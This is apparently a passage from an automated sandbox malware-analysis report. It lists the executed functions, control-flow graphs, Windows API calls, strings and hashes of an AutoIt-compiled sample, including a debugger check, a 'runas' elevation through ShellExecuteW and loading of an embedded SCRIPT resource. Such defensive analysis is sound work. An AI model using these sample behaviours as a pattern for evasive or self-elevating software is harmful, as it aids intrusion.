2fd2fc RegCloseKey 94673->94674 94675 2fd2e7 94673->94675 94674->94670 94675->94674

                                                                Executed Functions

                                                                Function 0030B043 Relevance: 21.5, APIs: 14, Instructions: 537COMMONLIBRARYCODE
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 643 30b043-30b080 call 30f8a0 646 30b082-30b084 643->646 647 30b089-30b08b 643->647 648 30b860-30b86c call 30a70c 646->648 649 30b0ac-30b0d9 647->649 650 30b08d-30b0a7 call 307bda call 307c0e call 306e10 647->650 651 30b0e0-30b0e7 649->651 652 30b0db-30b0de 649->652 650->648 656 30b105 651->656 657 30b0e9-30b100 call 307bda call 307c0e call 306e10 651->657 652->651 655 30b10b-30b110 652->655 661 30b112-30b11c call 30f82f 655->661 662 30b11f-30b12d call 313bf2 655->662 656->655 692 30b851-30b854 657->692 661->662 673 30b133-30b145 662->673 674 30b44b-30b45d 662->674 673->674 676 30b14b-30b183 call 307a0d GetConsoleMode 673->676 677 30b463-30b473 674->677 678 30b7b8-30b7d5 WriteFile 674->678 676->674 696 30b189-30b18f 676->696 681 30b479-30b484 677->681 682 30b55a-30b55f 677->682 684 30b7e1-30b7e7 GetLastError 678->684 685 30b7d7-30b7df 678->685 690 30b48a-30b49a 681->690 691 30b81b-30b833 681->691 687 30b663-30b66e 682->687 688 30b565-30b56e 682->688 686 30b7e9 684->686 685->686 693 30b7ef-30b7f1 686->693 687->691 700 30b674 687->700 688->691 694 30b574 688->694 697 30b4a0-30b4a3 690->697 698 30b835-30b838 691->698 699 30b83e-30b84e call 307c0e call 307bda 691->699 695 30b85e-30b85f 692->695 702 30b7f3-30b7f5 693->702 703 30b856-30b85c 693->703 704 30b57e-30b595 694->704 695->648 705 30b191-30b193 696->705 706 30b199-30b1bc GetConsoleCP 696->706 707 30b4a5-30b4be 697->707 708 30b4e9-30b520 WriteFile 697->708 698->699 709 30b83a-30b83c 698->709 699->692 710 30b67e-30b693 700->710 702->691 713 30b7f7-30b7fc 702->713 703->695 714 30b59b-30b59e 704->714 705->674 705->706 715 30b440-30b446 706->715 716 30b1c2-30b1ca 706->716 717 30b4c0-30b4ca 707->717 718 30b4cb-30b4e7 707->718 708->684 719 30b526-30b538 708->719 709->695 711 30b699-30b69b 710->711 720 30b6d8-30b719 WideCharToMultiByte 711->720 721 30b69d-30b6b3 711->721 723 30b812-30b819 call 307bed 713->723 724 30b7fe-30b810 call 307c0e call 307bda 713->724 725 30b5a0-30b5b6 714->725 726 30b5de-30b627 WriteFile 714->726 715->702 727 30b1d4-30b1d6 716->727 717->718 718->697 718->708 719->693 728 30b53e-30b54f 719->728 720->684 733 30b71f-30b721 720->733 730 30b6b5-30b6c4 721->730 731 30b6c7-30b6d6 721->731 723->692 724->692 735 30b5b8-30b5ca 725->735 736 30b5cd-30b5dc 725->736 726->684 738 30b62d-30b645 726->738 739 30b36b-30b36e 727->739 740 30b1dc-30b1fe 727->740 728->690 729 30b555 728->729 729->693 730->731 731->711 731->720 743 30b727-30b75a WriteFile 733->743 735->736 736->714 736->726 738->693 746 30b64b-30b658 738->746 741 30b370-30b373 739->741 742 30b375-30b3a2 739->742 747 30b200-30b215 740->747 748 30b217-30b223 call 301688 740->748 741->742 749 30b3a8-30b3ab 741->749 742->749 750 30b77a-30b78e GetLastError 743->750 751 30b75c-30b776 743->751 746->704 753 30b65e 746->753 754 30b271-30b283 call 3140f7 747->754 763 30b225-30b239 748->763 764 30b269-30b26b 748->764 757 30b3b2-30b3c5 call 315884 749->757 758 30b3ad-30b3b0 749->758 762 30b794-30b796 750->762 751->743 759 30b778 751->759 753->693 773 30b435-30b43b 754->773 774 30b289 754->774 757->684 777 30b3cb-30b3d5 757->777 758->757 765 30b407-30b40a 758->765 759->762 762->686 768 30b798-30b7b0 762->768 770 30b412-30b42d 763->770 771 30b23f-30b254 call 3140f7 763->771 764->754 765->727 769 30b410 765->769 768->710 775 30b7b6 768->775 769->773 770->773 771->773 783 30b25a-30b267 771->783 773->686 778 30b28f-30b2c4 WideCharToMultiByte 774->778 775->693 780 30b3d7-30b3ee call 315884 777->780 781 30b3fb-30b401 777->781 778->773 782 30b2ca-30b2f0 WriteFile 778->782 780->684 788 30b3f4-30b3f5 780->788 781->765 782->684 785 30b2f6-30b30e 782->785 783->778 785->773 787 30b314-30b31b 785->787 787->781 789 30b321-30b34c WriteFile 787->789 788->781 789->684 790 30b352-30b359 789->790 790->773 791 30b35f-30b366 790->791 791->781
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 8d460e5f0b6b38ea9c22fbcd7fc62ec2e270872620305533a1f51d09fd3fe064
                                                                • Instruction ID: 055bce5593123b8cd7f2137a01b42ea47d9ea9f1cf05413bbe1ba6b8b6b990e7
                                                                • Opcode Fuzzy Hash: 8d460e5f0b6b38ea9c22fbcd7fc62ec2e270872620305533a1f51d09fd3fe064
                                                                • Instruction Fuzzy Hash: 0B326C75B022288FDB26CF15DC916E9B7B9FF4A310F5940D9E40AA7A91D7309E80CF52
                                                                Function 002E3D19 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 151windowCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                APIs
                                                                • GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,002E3AA3,?), ref: 002E3D45
                                                                • IsDebuggerPresent.KERNEL32(?,?,?,?,002E3AA3,?), ref: 002E3D57
                                                                • GetFullPathNameW.KERNEL32(00007FFF,?,?,003A1148,003A1130,?,?,?,?,002E3AA3,?), ref: 002E3DC8
                                                                  • Part of subcall function 002E6430: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,002E3DEE,003A1148,?,?,?,?,?,002E3AA3,?), ref: 002E6471
                                                                • SetCurrentDirectoryW.KERNEL32(?,?,?,002E3AA3,?), ref: 002E3E48
                                                                • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,003928F4,00000010), ref: 00351CCE
                                                                • SetCurrentDirectoryW.KERNEL32(?,003A1148,?,?,?,?,?,002E3AA3,?), ref: 00351D06
                                                                • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,0037DAB4,003A1148,?,?,?,?,?,002E3AA3,?), ref: 00351D89
                                                                • ShellExecuteW.SHELL32(00000000,?,?,?,?,002E3AA3), ref: 00351D90
                                                                  • Part of subcall function 002E3E6E: GetSysColorBrush.USER32(0000000F), ref: 002E3E79
                                                                  • Part of subcall function 002E3E6E: LoadCursorW.USER32(00000000,00007F00), ref: 002E3E88
                                                                  • Part of subcall function 002E3E6E: LoadIconW.USER32(00000063), ref: 002E3E9E
                                                                  • Part of subcall function 002E3E6E: LoadIconW.USER32(000000A4), ref: 002E3EB0
                                                                  • Part of subcall function 002E3E6E: LoadIconW.USER32(000000A2), ref: 002E3EC2
                                                                  • Part of subcall function 002E3E6E: RegisterClassExW.USER32(?), ref: 002E3F30
                                                                  • Part of subcall function 002E36B8: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 002E36E6
                                                                  • Part of subcall function 002E36B8: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 002E3707
                                                                  • Part of subcall function 002E36B8: ShowWindow.USER32(00000000,?,?,?,?,002E3AA3,?), ref: 002E371B
                                                                  • Part of subcall function 002E36B8: ShowWindow.USER32(00000000,?,?,?,?,002E3AA3,?), ref: 002E3724
                                                                  • Part of subcall function 002E4FFC: _memset.LIBCMT ref: 002E5022
                                                                  • Part of subcall function 002E4FFC: Shell_NotifyIconW.SHELL32(00000000,?), ref: 002E50CB
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Window$IconLoad$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundMessageNotifyPresentRegisterShellShell__memset
                                                                • String ID: ()9$This is a third-party compiled AutoIt script.$runas
                                                                • API String ID: 438480954-3744312930
                                                                • Opcode ID: bd570246b66847f20157157b74019bf2af6fecfac986ef4b4895174f6b858f01
                                                                • Instruction ID: dd244255aef14e6cafa38439f365a0d020866118e828eb38b74f2a347841df24
                                                                • Opcode Fuzzy Hash: bd570246b66847f20157157b74019bf2af6fecfac986ef4b4895174f6b858f01
                                                                • Instruction Fuzzy Hash: 27512630EA42C8AACF13EBB2DC09EEE7B7D9F16744F444064F601671A2CAB046258F21
                                                                Function 002FDDC0 Relevance: 10.7, APIs: 7, Instructions: 175COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1137 2fddc0-2fde4f call 2ed7f7 GetVersionExW call 2e6a63 call 2fdfb4 call 2e6571 1146 2fde55-2fde56 1137->1146 1147 3524c8-3524cb 1137->1147 1150 2fde58-2fde63 1146->1150 1151 2fde92-2fdea2 call 2fdf77 1146->1151 1148 3524e4-3524e8 1147->1148 1149 3524cd 1147->1149 1154 3524d3-3524dc 1148->1154 1155 3524ea-3524f3 1148->1155 1153 3524d0 1149->1153 1156 2fde69-2fde6b 1150->1156 1157 35244e-352454 1150->1157 1164 2fdec7-2fdee1 1151->1164 1165 2fdea4-2fdec1 GetCurrentProcess call 2fdf5f 1151->1165 1153->1154 1154->1148 1155->1153 1161 3524f5-3524f8 1155->1161 1162 352469-352475 1156->1162 1163 2fde71-2fde74 1156->1163 1159 352456-352459 1157->1159 1160 35245e-352464 1157->1160 1159->1151 1160->1151 1161->1154 1166 352477-35247a 1162->1166 1167 35247f-352485 1162->1167 1168 352495-352498 1163->1168 1169 2fde7a-2fde89 1163->1169 1171 2fdee3-2fdef7 call 2fe00c 1164->1171 1172 2fdf31-2fdf3b GetSystemInfo 1164->1172 1165->1164 1188 2fdec3 1165->1188 1166->1151 1167->1151 1168->1151 1173 35249e-3524b3 1168->1173 1174 2fde8f 1169->1174 1175 35248a-352490 1169->1175 1185 2fdf29-2fdf2f GetSystemInfo 1171->1185 1186 2fdef9-2fdf01 call 2fdff4 GetNativeSystemInfo 1171->1186 1179 2fdf0e-2fdf1a 1172->1179 1176 3524b5-3524b8 1173->1176 1177 3524bd-3524c3 1173->1177 1174->1151 1175->1151 1176->1151 1177->1151 1181 2fdf1c-2fdf1f FreeLibrary 1179->1181 1182 2fdf21-2fdf26 1179->1182 1181->1182 1187 2fdf03-2fdf07 1185->1187 1186->1187 1187->1179 1190 2fdf09-2fdf0c FreeLibrary 1187->1190 1188->1164 1190->1179
                                                                APIs
                                                                • GetVersionExW.KERNEL32(?), ref: 002FDDEC
                                                                • GetCurrentProcess.KERNEL32(00000000,0037DC38,?,?), ref: 002FDEAC
                                                                • GetNativeSystemInfo.KERNELBASE(?,0037DC38,?,?), ref: 002FDF01
                                                                • FreeLibrary.KERNEL32(00000000,?,?), ref: 002FDF0C
                                                                • FreeLibrary.KERNEL32(00000000,?,?), ref: 002FDF1F
                                                                • GetSystemInfo.KERNEL32(?,0037DC38,?,?), ref: 002FDF29
                                                                • GetSystemInfo.KERNEL32(?,0037DC38,?,?), ref: 002FDF35
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: InfoSystem$FreeLibrary$CurrentNativeProcessVersion
                                                                • String ID:
                                                                • API String ID: 3851250370-0
                                                                • Opcode ID: f2581a125cc78e566509d1b9ab90ec33514895c488f640ec96dd1998bd2d3976
                                                                • Instruction ID: 5fc782b049eb61e549e29f28b500a9aef98a614fae9d55ac87e2092628eca249
                                                                • Opcode Fuzzy Hash: f2581a125cc78e566509d1b9ab90ec33514895c488f640ec96dd1998bd2d3976
                                                                • Instruction Fuzzy Hash: 8B61C5B181A388CFCF16CF6894C05E9BFB56F2A300F1985E8DC459F207C664C919CB66
                                                                Function 002E406B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1209 2e406b-2e4083 CreateStreamOnHGlobal 1210 2e4085-2e409c FindResourceExW 1209->1210 1211 2e40a3-2e40a6 1209->1211 1212 354f16-354f25 LoadResource 1210->1212 1213 2e40a2 1210->1213 1212->1213 1214 354f2b-354f39 SizeofResource 1212->1214 1213->1211 1214->1213 1215 354f3f-354f4a LockResource 1214->1215 1215->1213 1216 354f50-354f6e 1215->1216 1216->1213
                                                                APIs
                                                                • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,002E449E,?,?,00000000,00000001), ref: 002E407B
                                                                • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,002E449E,?,?,00000000,00000001), ref: 002E4092
                                                                • LoadResource.KERNEL32(?,00000000,?,?,002E449E,?,?,00000000,00000001,?,?,?,?,?,?,002E41FB), ref: 00354F1A
                                                                • SizeofResource.KERNEL32(?,00000000,?,?,002E449E,?,?,00000000,00000001,?,?,?,?,?,?,002E41FB), ref: 00354F2F
                                                                • LockResource.KERNEL32(002E449E,?,?,002E449E,?,?,00000000,00000001,?,?,?,?,?,?,002E41FB,00000000), ref: 00354F42
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                • String ID: SCRIPT
                                                                • API String ID: 3051347437-3967369404
                                                                • Opcode ID: cb54377ceee68fdab571279e9dab9af8b9f285f326c3ec99675e231b137f80cd
                                                                • Instruction ID: 6dd0058954eb5c5fab34264f07d269344e89ff4bc27b7433726c2f40b7b82b70
                                                                • Opcode Fuzzy Hash: cb54377ceee68fdab571279e9dab9af8b9f285f326c3ec99675e231b137f80cd
                                                                • Instruction Fuzzy Hash: 9D117C70640741BFEB269B66EC48F277BBDEBC5B51F10856DF602862A0DBB1DC009A20
                                                                Function 00326CA9 Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetFileAttributesW.KERNELBASE(?,00352F49), ref: 00326CB9
                                                                • FindFirstFileW.KERNELBASE(?,?), ref: 00326CCA
                                                                • FindClose.KERNEL32(00000000), ref: 00326CDA
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: FileFind$AttributesCloseFirst
                                                                • String ID:
                                                                • API String ID: 48322524-0
                                                                • Opcode ID: 9819d360ca04c342c54bc8cbabf4ec4a4fbeab1317a41998ccf98285d800dd20
                                                                • Instruction ID: 57d8d14bbff26d76d39de28daea1f93a26352e7d5c9a81aa653d6255bb4675cf
                                                                • Opcode Fuzzy Hash: 9819d360ca04c342c54bc8cbabf4ec4a4fbeab1317a41998ccf98285d800dd20
                                                                • Instruction Fuzzy Hash: 92E012319145255782156738AC0A4A976ACDE0A339F104715F575C11D0E7F0994445D5
                                                                Function 002EE8D0 Relevance: 49.8, APIs: 24, Strings: 4, Instructions: 816windowsleeptimeCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 002EE959
                                                                • timeGetTime.WINMM ref: 002EEBFA
                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 002EED2E
                                                                • TranslateMessage.USER32(?), ref: 002EED3F
                                                                • DispatchMessageW.USER32(?), ref: 002EED4A
                                                                • LockWindowUpdate.USER32(00000000), ref: 002EED79
                                                                • DestroyWindow.USER32 ref: 002EED85
                                                                • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 002EED9F
                                                                • Sleep.KERNEL32(0000000A), ref: 00355270
                                                                • TranslateMessage.USER32(?), ref: 003559F7
                                                                • DispatchMessageW.USER32(?), ref: 00355A05
                                                                • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00355A19
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Message$DispatchPeekTranslateWindow$DestroyLockSleepTimeUpdatetime
                                                                • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                                • API String ID: 2641332412-570651680
                                                                • Opcode ID: 069d023ea52789635383c15747b0aba3e6a90406ffdd6349b500048bf9213b7a
                                                                • Instruction ID: 6fa5525db76bceb064149049e2f7a7e0db69b010273647b262e6351f8d61ce04
                                                                • Opcode Fuzzy Hash: 069d023ea52789635383c15747b0aba3e6a90406ffdd6349b500048bf9213b7a
                                                                • Instruction Fuzzy Hash: 8F62F270554380CFDB22DF25C895FAA77E8BF44304F59487DE9468B2A2DBB0E848CB52
                                                                Function 00315C78 Relevance: 47.9, APIs: 26, Strings: 1, Instructions: 626fileCOMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                • ___createFile.LIBCMT ref: 00315EC3
                                                                • ___createFile.LIBCMT ref: 00315F04
                                                                • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00315F2D
                                                                • __dosmaperr.LIBCMT ref: 00315F34
                                                                • GetFileType.KERNELBASE(00000000,?,?,?,?,?,00000000,00000109), ref: 00315F47
                                                                • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00315F6A
                                                                • __dosmaperr.LIBCMT ref: 00315F73
                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00315F7C
                                                                • __set_osfhnd.LIBCMT ref: 00315FAC
                                                                • __lseeki64_nolock.LIBCMT ref: 00316016
                                                                • __close_nolock.LIBCMT ref: 0031603C
                                                                • __chsize_nolock.LIBCMT ref: 0031606C
                                                                • __lseeki64_nolock.LIBCMT ref: 0031607E
                                                                • __lseeki64_nolock.LIBCMT ref: 00316176
                                                                • __lseeki64_nolock.LIBCMT ref: 0031618B
                                                                • __close_nolock.LIBCMT ref: 003161EB
                                                                  • Part of subcall function 0030EA9C: CloseHandle.KERNELBASE(00000000,0038EEF4,00000000,?,00316041,0038EEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0030EAEC
                                                                  • Part of subcall function 0030EA9C: GetLastError.KERNEL32(?,00316041,0038EEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0030EAF6
                                                                  • Part of subcall function 0030EA9C: __free_osfhnd.LIBCMT ref: 0030EB03
                                                                  • Part of subcall function 0030EA9C: __dosmaperr.LIBCMT ref: 0030EB25
                                                                  • Part of subcall function 00307C0E: __getptd_noexit.LIBCMT ref: 00307C0E
                                                                • __lseeki64_nolock.LIBCMT ref: 0031620D
                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00316342
                                                                • ___createFile.LIBCMT ref: 00316361
                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0031636E
                                                                • __dosmaperr.LIBCMT ref: 00316375
                                                                • __free_osfhnd.LIBCMT ref: 00316395
                                                                • __invoke_watson.LIBCMT ref: 003163C3
                                                                • __wsopen_helper.LIBCMT ref: 003163DD
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$CloseHandle___create$__close_nolock__free_osfhnd$Type__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd__wsopen_helper
                                                                • String ID: @
                                                                • API String ID: 3896587723-2766056989
                                                                • Opcode ID: 42855fe815953f375f277eb2c315027db5d1313443ae5bb0387e71f811e30cfe
                                                                • Instruction ID: abad7d2dfc9f73a854183faa7c4429c4991cc713edf9e48304d0bcfb986349e7
                                                                • Opcode Fuzzy Hash: 42855fe815953f375f277eb2c315027db5d1313443ae5bb0387e71f811e30cfe
                                                                • Instruction Fuzzy Hash: D9223371D046059BEB2F9FA8DC56BFD7B25EB58310F294628E8219B2E1C3358DC1C791
                                                                Function 0032FA0C Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 238COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                APIs
                                                                • _wcscpy.LIBCMT ref: 0032FA96
                                                                • _wcschr.LIBCMT ref: 0032FAA4
                                                                • _wcscpy.LIBCMT ref: 0032FABB
                                                                • _wcscat.LIBCMT ref: 0032FACA
                                                                • _wcscat.LIBCMT ref: 0032FAE8
                                                                • _wcscpy.LIBCMT ref: 0032FB09
                                                                • __wsplitpath.LIBCMT ref: 0032FBE6
                                                                • _wcscpy.LIBCMT ref: 0032FC0B
                                                                • _wcscpy.LIBCMT ref: 0032FC1D
                                                                • _wcscpy.LIBCMT ref: 0032FC32
                                                                • _wcscat.LIBCMT ref: 0032FC47
                                                                • _wcscat.LIBCMT ref: 0032FC59
                                                                • _wcscat.LIBCMT ref: 0032FC6E
                                                                  • Part of subcall function 0032BFA4: _wcscmp.LIBCMT ref: 0032C03E
                                                                  • Part of subcall function 0032BFA4: __wsplitpath.LIBCMT ref: 0032C083
                                                                  • Part of subcall function 0032BFA4: _wcscpy.LIBCMT ref: 0032C096
                                                                  • Part of subcall function 0032BFA4: _wcscat.LIBCMT ref: 0032C0A9
                                                                  • Part of subcall function 0032BFA4: __wsplitpath.LIBCMT ref: 0032C0CE
                                                                  • Part of subcall function 0032BFA4: _wcscat.LIBCMT ref: 0032C0E4
                                                                  • Part of subcall function 0032BFA4: _wcscat.LIBCMT ref: 0032C0F7
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: _wcscat$_wcscpy$__wsplitpath$_wcschr_wcscmp
                                                                • String ID: >>>AUTOIT SCRIPT<<<$t29
                                                                • API String ID: 2955681530-3547193057
                                                                • Opcode ID: 36cbd3478801bd85be30e2c226aff36d5618a749850161ee01eed220ca87c2b8
                                                                • Instruction ID: 191a2b5ad4a055a6f71426c2612f9231ecddaa314b9815eb130086a83902e861
                                                                • Opcode Fuzzy Hash: 36cbd3478801bd85be30e2c226aff36d5618a749850161ee01eed220ca87c2b8
                                                                • Instruction Fuzzy Hash: E591D072504355AFDB26EB50D851F9FB3E8BF94300F004869F9899B292DB34EA54CF92
                                                                Function 002E3F53 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53windowregistryCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                APIs
                                                                • GetSysColorBrush.USER32(0000000F), ref: 002E3F86
                                                                • RegisterClassExW.USER32(00000030), ref: 002E3FB0
                                                                • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 002E3FC1
                                                                • InitCommonControlsEx.COMCTL32(?), ref: 002E3FDE
                                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 002E3FEE
                                                                • LoadIconW.USER32(000000A9), ref: 002E4004
                                                                • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 002E4013
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
